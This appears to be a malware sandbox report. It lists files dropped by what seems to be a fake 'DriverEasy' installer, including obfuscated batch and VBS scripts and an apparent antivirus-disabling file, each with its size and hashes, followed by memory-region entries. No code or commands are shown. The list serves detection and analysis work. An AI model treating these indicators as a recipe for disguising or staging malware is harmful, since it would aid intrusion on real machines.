2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\ControlSet001_obf.bat
Filesize
71KB

MD5
85683ccbdd6d1a89ee8fae20d364928b

SHA1
77af8e1a3102958106fa620e7795109b1e135aa2

SHA256
fbe63b3379637817de60c8db5392a75c2f5731f4a864f8bfb1f68b4eb20ac7d6

SHA512
2b974b64b0f7154390b730e265e58f6bb7d239e8ce62f3e64453c1d0b3119643fde00d2a2d1cf3b234905ab7687f2207d48c1cf8c1b033a745956f1cd3670877

Download Submit
C:\ProgramData\SurfaceReduction\ControlSet002.bat
Filesize
186B

MD5
d62adedd663f3bc437e8c234bd818fe8

SHA1
785984b360807df58434723f588a5dfc94b5e7a1

SHA256
6cbc7c7a5ca124d27f3bf0f407fe8e1af5009313cb2f31c6de320b2549857333

SHA512
4b1dc05aee7621570466aadf4bdc0b866fa0e386615eae92a4b382af83c35c6af97276eab6a4f7a51a783dbfb4b61cf3139eb007080f3a13a13a3260e75227ea

Download Submit
C:\ProgramData\SurfaceReduction\ControlSet003.vbs
Filesize
6KB

MD5
4b47d820e1ba7ea36ca0ddebda829ab3

SHA1
c5a018b519a3892cfd262198c04584d909af809c

SHA256
4d770c50ff8d5aa91acf39abf462ff30ecb83e5b2ffc4bb03f356ecde2f516b9

SHA512
29edeab802d7befce1c2135b541c379ab440335efde1e8417fc2498705ee06cffd8b9d0b350d095665995667310cd2838ccf698ca9c13e462e26ae483d091216

Download Submit
C:\ProgramData\SurfaceReduction\compil32_obf.bat
Filesize
489B

MD5
b54cbf7c62f1e361ae96b81baa4e87ae

SHA1
4e0f00598b8c3a202e937c95416a563b5856097f

SHA256
70731b66dbafc1ed5711b8de3b844f1a125ff418f111a2d5d427de2468859b04

SHA512
ae3504ad108af7b9865a47aeeb86501a9c43bc800ea88bc9b67d8484390445951e0e6285b8287d6bd0f377399505e0e6348f22cb417eba0d9c0ed86dcc3188aa

Download Submit
C:\ProgramData\SurfaceReduction\extracted\ANTIAV~1.DAT
Filesize
2.1MB

MD5
cab14b0bbfb0784debbe9c31d60bf8ed

SHA1
d74032b34189e9d022d47fb9191e9d6ff8679d70

SHA256
5906d4ec6168ece1f7873ad067a4f30999f298142d0e7d217c16aac8a9386147

SHA512
a4323f8e0ab813bbf42e28e299d3e564c1bddf52ab1dff61b20e316ba1df5f6e9f7c17653e103daa03dbaa0a43dbf4a5bcdfbfd746c7716927f100bc30ef36a7

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_1.zip
Filesize
1.2MB

MD5
37a9fc03362d4e2a91028ea12d5440ea

SHA1
539477312c35364d485f76b641d89b66c702def5

SHA256
012a4528bb6b9dde780d627a0f22b440ff26fac4a80ebc91266a7cc95f324d4b

SHA512
49ac51db69e4201b8c8af206dd35b62b448a7c713cbf564266e98d29953b5a8673202331c663da6b7bc241a1435a23f06bf477e1546f8b9f79070aea66c51b52

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_10.zip
Filesize
1.2MB

MD5
865d5a4cb771be6ae6f505914b1c56a7

SHA1
1291cee5a90c9d9690ce059e3c49bc6b7621f44b

SHA256
4d4d200ac10878dddc42f1daa30284c75d3653a99d035141c05b73f237316cb9

SHA512
c5751d2e791cbd03e6650f980cc1c1de6479407181b75ae88ade129976a68758273e7d57ccea0cd370055bc4892de850c2995985ac8263446912d1b83d97dc25

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_11.zip
Filesize
2.7MB

MD5
cbbe72d0fa7d9c739fc5158d358dde6c

SHA1
22254b0390497f56229cfb743c12de4b434c1637

SHA256
b409ec09d8ab5d68a57894ab4a7f7b652ad708b44a7f06d0628badb52962db84

SHA512
18e6a2daac396ee311f87a2a2fa41557bac2924894bd25cfa8e4c4f0ed0e31e11cf779a0abedd0fa620325417eb6797d89bfa7f8114ac6f7b839ff8c5a4e7401

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_2.zip
Filesize
1.2MB

MD5
1ee352888327b22d5d1322921869ec32

SHA1
a1cfa55dbd550322e034aa2a55d2ded386b4ae85

SHA256
5fb813ace4842f2a963690d4fb72de77c25e565ad472cae29abf76fad6ee65bf

SHA512
b699dcc3b1566468fc0fd39875a0562439c5a85e96eb6f864301e4b46f90cffe3c88901c587aa23bd7cd879ec490ca44ee42d137580a695c50e1a5b1ca64d43e

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_3.zip
Filesize
1.2MB

MD5
f2190398337be5a94363704eeebbcc5f

SHA1
6a807dd4ef24450c8df2957665edcb87aef1cdd1

SHA256
413e062e7cee0417b6f6e5c6d461966f3fd909b163919e5a832bea791d2d2c1d

SHA512
22671862dcb57cfb9753a0ae54b955a57df35e5119da08b9143896bce2fa6132c1e629fa2888b97c97dc9f4a481f23b9db3604f2447440c1f1bbd4071f3bf6dd

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_4.zip
Filesize
1.2MB

MD5
92ea3f0f8ecbf9ae630c1809a3d63e88

SHA1
f74821b0d60260628406acadd753c26cbbadf875

SHA256
3d54b4a81c569fe86d0efa62f565990dc1b2828abed199e5edea5d96606c4292

SHA512
fa02db5f7821b675254c668852e255c810f6be1eefa68901fbfbeac26093fd88b55278f108ce9b7e8ccebf3f3b68fe70f69abd0f7b9ac38425fd07d463ea9574

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_5.zip
Filesize
1.2MB

MD5
c286dca42d0bf0e3225c3d7648ec4567

SHA1
ff311804e8d3b52c6b3b119a116e500cf99cda46

SHA256
fa189a2220197006912e130748b24f2ea8d26b7a69d6146e7aa2b166d7a4d779

SHA512
1e9e8deb7e6d3407212fead035208fd6c6932c3573f5c5b90f8c01b7bcc52452f6e0108e6021133ca602ef8caa89b6986e58d50bc031687360fceaa81990a297

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_6.zip
Filesize
1.2MB

MD5
731a2f00f2d78c1403fe1f6da91f74f8

SHA1
c8ac81210b1c36f7754a6425047a518234128d71

SHA256
af668686a95132cea701ee765c0be014a48df2f3bff2d5c1184f9101dcd1ecf3

SHA512
89231305cebbc9c44479b0bea5314e7ed7d1144b495b0b526f8e1a1179ca3535f02c0cd1953d5583fa6edf5a1da795568162d1eecb8efa8a2b5fbc78c5ddcb07

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_7.zip
Filesize
1.2MB

MD5
2de49fba88e2c22beb7d786775c00a34

SHA1
2435d25e6b38816d432d60dd9867340fffeac331

SHA256
ee718c48eb62f9815768f877f2ae0a103762476945dec3feb25caaab3eed42fe

SHA512
531d7ada30f31ad6ddb3c934e08d78db205e1c7ee5cba5772726fd76311f289432f6e15a935fb6e4f2b4bd5ea236d91c3be8ef3d4a94c7211d95472b9fe8c553

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_8.zip
Filesize
1.2MB

MD5
6fe82c7d0b0b57b2625dc3b176c17ab2

SHA1
1088935bb4fab111b74ef23d08c071a0f2359cf8

SHA256
e5cf8bf99bf9b93ebed147ac3395eb77bd2a930ae2a2ea9c4d0a55e9a962b1c3

SHA512
f2339e8814cc2bccb5d75d98329b748784c8ccc1d029a2c9b7efa6e9589bf08035b3ca41c2833805f3bdeef22bd8b4af84215d471eee60a9a056ec01f9db95a2

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_9.zip
Filesize
1.2MB

MD5
8a4ee10b00b421ea3cba409a09bb8dfb

SHA1
e355cdad9903f0515eb45391b3f9d62ae8b19d14

SHA256
da5f3fbab9bd97eec3ff94eddfa7eeec6d9752ca06e2f69a91a41eff69f7943f

SHA512
1831003590f866808bb5f7ee94aa78239cf569f10792bb69e78b7e7629735009790742bea153336c421633c139ba0b8d8b8b8d493047b30d4a63fd3bc7e6d27d

Download Submit
C:\ProgramData\SurfaceReduction\extracted\lrPBx4qjVQLL.exe
Filesize
1.5MB

MD5
018dbebc18d0989b6c5a0916a7aeb8ee

SHA1
3d9d22ef47c09230fda8d66945e00e3538f2d975

SHA256
82112a8c76d6bab37acadc1e1a113e43b6dc966f48b9f2a0cc8fdbd844ee2f7a

SHA512
a97b649deaed7f44b03f882648dbaa26ebddc9d925e161d6b523a09861950efef17cb14339f22a92184ca9184abb92b04e2d4f07a7914ae0e091f4f2560adf96

Download Submit
C:\ProgramData\SurfaceReduction\file.bin
Filesize
2.7MB

MD5
50f2695f0630c064cc5aef89457258a4

SHA1
8b3bb3cb8571d2e675d8464044f4f1d465a7311d

SHA256
0ed5dec3371f14dd7afe6b537ff2205a0109ecdb965ff24b65b1245bf6a88090

SHA512
36fa74393482848f18c719a66dba256408aa9a4be94fdf9c85b699186eaa8d227617c889cb92f3062d830569067c8559ccd6f3b51c0c11508ebd4a9a79871894

Download Submit
C:\ProgramData\SurfaceReduction\hfile.bin
Filesize
2.7MB

MD5
a875e51c69140cf48b25d6cd3a42e5d7

SHA1
69b95f4753254b2998037dd336a9f973876bb5fc

SHA256
840434f1f0c9094901d850341ac3766a3ec0a3d45b44cffadbe42b05924d9054

SHA512
03cfa8865f6895f3f1bd7b18e0aa599d01bec683b953f10349f584e5986b4c01f2bebbe89263c99e9433529c983b3b78de2a35a20fd3f02ab5e9098dd5c71816

Download Submit
C:\ProgramData\SurfaceReduction\main.bat
Filesize
397B

MD5
64e4a3acc6321c0922189168e35c2c3d

SHA1
e8ca3583870be25ac3a91d6fc51c11d49463cd5d

SHA256
307b5ac5ac7ae6ce433dcad2ee72fa2aa4ce9e2283f1093eaedfc96edf670ca2

SHA512
fe9907be249df93940af4592d787fa8cd597453796902b11605485ea16848e566c2542de696b74da7e73f93b67b9660980a39e67a567fcc19f1453e21583f99f

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-D4OCA.tmp\DriverEasy.5.7.3.exe
Filesize
4.0MB

MD5
af59aa7c463b1bcfdf52fc356beb7602

SHA1
0329261c4764f41b88bb2ff89fbab886d747a21f

SHA256
1e7ad3c0528b4e11b7b3f9b31e4321471f746cd722034aa2bf7d10ebb51100df

SHA512
9ed8eb2d9b596916334c303ca2c1cb2d200cad4305fd294f15f83bf815c6b2b7840beb2027bd0e264ecd394728f9a1a2b75a3b9553caaf1ce89c70756e0f0987

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-D4OCA.tmp\DriverEasy.5.7.3.exe
Filesize
4.0MB

MD5
af59aa7c463b1bcfdf52fc356beb7602

SHA1
0329261c4764f41b88bb2ff89fbab886d747a21f

SHA256
1e7ad3c0528b4e11b7b3f9b31e4321471f746cd722034aa2bf7d10ebb51100df

SHA512
9ed8eb2d9b596916334c303ca2c1cb2d200cad4305fd294f15f83bf815c6b2b7840beb2027bd0e264ecd394728f9a1a2b75a3b9553caaf1ce89c70756e0f0987

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QAFB0.tmp\DriverEasy.5.7.3.tmp
Filesize
1.1MB

MD5
bf61f7e7761c80a27b13f82014f5687b

SHA1
1894fac2a9e8adcfb74a864e92155f9a4506a9d5

SHA256
26f877e0e715507e37f2ca323e0e5897d4246478ee55b8b779eb0b4e92ef7244

SHA512
df0dc8a6db13218b4a4e1c47b13f791d10fff5649d0fda5bf40636a22128abd83d57a7dd695e8cd4ddb0e09d050eff033eaa2aa242fa7e1b20cf61f36e49b54a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-SDBFS.tmp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
Filesize
3.1MB

MD5
fd99abd9170a55136517f4c93c5afbf9

SHA1
f1aa4171e82b8ddd66e2b8c7ade40a27397a9e4d

SHA256
0a4b31893f11ed266df9e3d740be1b53fb0345c11903317eb13c254628fa9b77

SHA512
5256302bbbb3639fcb14b9ea8653df0830e16a3feb3b0cc2ea09ac648c3dc11c1a66f1f4cbcf36f60fa4170b7c27cd002abac2c20c5d4b917a80b54f20cc2b64

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
cc85cf9317863ac172cce865b302b8e2

SHA1
6f67b4d689fb334971b6a76128a4864e0abd76da

SHA256
3a2ed8121f19979654160c303dd94280b3559aa6b976bbc54c253f31e88e6e31

SHA512
54caa894f5258f9f266c72be014c448676de94ddd36287a605679862b1c0c36516185e7cc531019c034e420c9297fe3cdc543227b0e7b2dbec800bdc4b16a40b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
cc85cf9317863ac172cce865b302b8e2

SHA1
6f67b4d689fb334971b6a76128a4864e0abd76da

SHA256
3a2ed8121f19979654160c303dd94280b3559aa6b976bbc54c253f31e88e6e31

SHA512
54caa894f5258f9f266c72be014c448676de94ddd36287a605679862b1c0c36516185e7cc531019c034e420c9297fe3cdc543227b0e7b2dbec800bdc4b16a40b

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
\Users\Admin\AppData\Local\Temp\is-D4OCA.tmp\DriverEasy.5.7.3.exe
Filesize
4.0MB

MD5
af59aa7c463b1bcfdf52fc356beb7602

SHA1
0329261c4764f41b88bb2ff89fbab886d747a21f

SHA256
1e7ad3c0528b4e11b7b3f9b31e4321471f746cd722034aa2bf7d10ebb51100df

SHA512
9ed8eb2d9b596916334c303ca2c1cb2d200cad4305fd294f15f83bf815c6b2b7840beb2027bd0e264ecd394728f9a1a2b75a3b9553caaf1ce89c70756e0f0987

Download Submit
\Users\Admin\AppData\Local\Temp\is-D4OCA.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
\Users\Admin\AppData\Local\Temp\is-QAFB0.tmp\DriverEasy.5.7.3.tmp
Filesize
1.1MB

MD5
bf61f7e7761c80a27b13f82014f5687b

SHA1
1894fac2a9e8adcfb74a864e92155f9a4506a9d5

SHA256
26f877e0e715507e37f2ca323e0e5897d4246478ee55b8b779eb0b4e92ef7244

SHA512
df0dc8a6db13218b4a4e1c47b13f791d10fff5649d0fda5bf40636a22128abd83d57a7dd695e8cd4ddb0e09d050eff033eaa2aa242fa7e1b20cf61f36e49b54a

Download Submit
\Users\Admin\AppData\Local\Temp\is-RVG3H.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-RVG3H.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-RVG3H.tmp\b2p.dll
Filesize
22KB

MD5
ab35386487b343e3e82dbd2671ff9dab

SHA1
03591d07aea3309b631a7d3a6e20a92653e199b8

SHA256
c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

SHA512
b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

Download Submit
\Users\Admin\AppData\Local\Temp\is-RVG3H.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
\Users\Admin\AppData\Local\Temp\is-RVG3H.tmp\iswin7logo.dll
Filesize
39KB

MD5
1ea948aad25ddd347d9b80bef6df9779

SHA1
0be971e67a6c3b1297e572d97c14f74b05dafed3

SHA256
30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

SHA512
f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

Download Submit
\Users\Admin\AppData\Local\Temp\is-SDBFS.tmp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
Filesize
3.1MB

MD5
fd99abd9170a55136517f4c93c5afbf9

SHA1
f1aa4171e82b8ddd66e2b8c7ade40a27397a9e4d

SHA256
0a4b31893f11ed266df9e3d740be1b53fb0345c11903317eb13c254628fa9b77

SHA512
5256302bbbb3639fcb14b9ea8653df0830e16a3feb3b0cc2ea09ac648c3dc11c1a66f1f4cbcf36f60fa4170b7c27cd002abac2c20c5d4b917a80b54f20cc2b64

Download Submit
memory/376-123-0x0000000000000000-mapping.dmp

Download
memory/540-143-0x0000000000000000-mapping.dmp

Download
memory/572-174-0x0000000000000000-mapping.dmp

Download
memory/604-192-0x0000000000000000-mapping.dmp

Download
memory/692-137-0x0000000000000000-mapping.dmp

Download
memory/824-178-0x0000000000000000-mapping.dmp

Download
memory/832-96-0x0000000000000000-mapping.dmp

Download
memory/856-105-0x0000000000000000-mapping.dmp

Download
memory/860-108-0x0000000000000000-mapping.dmp

Download
memory/904-113-0x0000000000000000-mapping.dmp

Download
memory/944-65-0x0000000000000000-mapping.dmp

Download
memory/944-69-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/944-85-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/956-102-0x0000000000000000-mapping.dmp

Download
memory/968-199-0x0000000001EC0000-0x000000000252A000-memory.dmp

Filesize
6.4MB

Download
memory/968-191-0x0000000000000000-mapping.dmp

Download
memory/968-195-0x0000000002530000-0x0000000002674000-memory.dmp

Filesize
1.3MB

Download
memory/968-200-0x0000000002530000-0x0000000002674000-memory.dmp

Filesize
1.3MB

Download
memory/968-206-0x0000000002530000-0x0000000002674000-memory.dmp

Filesize
1.3MB

Download
memory/968-193-0x0000000001EC0000-0x000000000252A000-memory.dmp

Filesize
6.4MB

Download
memory/968-194-0x0000000001EC0000-0x000000000252A000-memory.dmp

Filesize
6.4MB

Download
memory/968-198-0x0000000002530000-0x0000000002674000-memory.dmp

Filesize
1.3MB

Download
memory/968-201-0x000000000B530000-0x000000000B5F6000-memory.dmp

Filesize
792KB

Download
memory/976-110-0x0000000000000000-mapping.dmp

Download
memory/992-111-0x0000000000000000-mapping.dmp

Download
memory/1000-109-0x0000000000000000-mapping.dmp

Download
memory/1020-125-0x0000000000000000-mapping.dmp

Download
memory/1252-107-0x0000000000000000-mapping.dmp

Download
memory/1336-151-0x0000000000000000-mapping.dmp

Download
memory/1344-136-0x0000000000000000-mapping.dmp

Download
memory/1364-159-0x0000000000000000-mapping.dmp

Download
memory/1436-169-0x0000000000000000-mapping.dmp

Download
memory/1444-119-0x0000000000000000-mapping.dmp

Download
memory/1456-147-0x0000000000000000-mapping.dmp

Download
memory/1488-118-0x0000000000000000-mapping.dmp

Download
memory/1504-120-0x0000000000000000-mapping.dmp

Download
memory/1504-171-0x0000000000000000-mapping.dmp

Download
memory/1516-124-0x0000000000000000-mapping.dmp

Download
memory/1524-140-0x0000000000000000-mapping.dmp

Download
memory/1600-117-0x0000000000000000-mapping.dmp

Download
memory/1624-163-0x0000000000000000-mapping.dmp

Download
memory/1624-114-0x0000000000000000-mapping.dmp

Download
memory/1636-155-0x0000000000000000-mapping.dmp

Download
memory/1644-207-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1644-209-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1644-202-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1644-204-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1656-67-0x0000000000000000-mapping.dmp

Download
memory/1704-98-0x0000000000000000-mapping.dmp

Download
memory/1716-115-0x0000000000000000-mapping.dmp

Download
memory/1732-121-0x0000000000000000-mapping.dmp

Download
memory/1744-116-0x0000000000000000-mapping.dmp

Download
memory/1748-106-0x0000000000000000-mapping.dmp

Download
memory/1764-134-0x0000000072F00000-0x00000000734AB000-memory.dmp

Filesize
5.7MB

Download
memory/1764-130-0x0000000000000000-mapping.dmp

Download
memory/1768-84-0x0000000000670000-0x000000000067F000-memory.dmp

Filesize
60KB

Download
memory/1768-99-0x00000000003C0000-0x00000000003C3000-memory.dmp

Filesize
12KB

Download
memory/1768-87-0x00000000003C0000-0x00000000003C3000-memory.dmp

Filesize
12KB

Download
memory/1768-86-0x0000000073EC0000-0x0000000073EDB000-memory.dmp

Filesize
108KB

Download
memory/1768-74-0x0000000000000000-mapping.dmp

Download
memory/1768-88-0x0000000073C70000-0x0000000073C81000-memory.dmp

Filesize
68KB

Download
memory/1772-122-0x0000000000000000-mapping.dmp

Download
memory/1784-129-0x0000000072950000-0x0000000072EFB000-memory.dmp

